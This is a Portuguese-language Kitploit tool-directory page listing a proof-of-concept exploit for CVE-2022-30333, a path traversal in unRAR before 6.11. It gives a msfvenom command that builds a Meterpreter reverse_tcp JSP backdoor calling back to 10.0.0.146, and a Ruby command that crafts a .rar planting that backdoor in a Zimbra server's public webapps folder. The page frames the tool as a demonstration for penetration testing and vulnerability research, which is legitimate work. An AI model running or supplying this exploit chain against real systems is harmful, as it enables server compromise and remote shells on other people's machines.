Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

Exploração de prova de conceito para travessia de caminho CVE-2022-30333 no unRAR, gerando arquivos .rar maliciosos para plantar payloads em locais arbitrários. Integra-se com Metasploit e msfvenom para teste de penetração.

Ver Repositório
1451há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Uma prova de conceito para o CVE-2022-30333 - uma vulnerabilidade de path traversal no unRAR anterior à versão 6.11. Criei isto como uma demonstração do exploit para um artigo no AttackerKB, e espero incorporá-lo em um Módulo Metasploit em breve!

Basicamente, você fornece um alvo (incluindo path traversal) e alguns dados de arquivo, e esta ferramenta gerará um .rar que extrairá esse arquivo para esse local. O comprimento máximo do arquivo é de 104 bytes, e o comprimento máximo do arquivo é de 4096 bytes. (Isso não é intrínseco à vulnerabilidade, é apenas o que escolhi quando geri o arquivo).

Por exemplo, gere uma backdoor com msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Depois crie um arquivo .rar, plantando o .jsp em algum lugar interessante:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Baixar ferramenta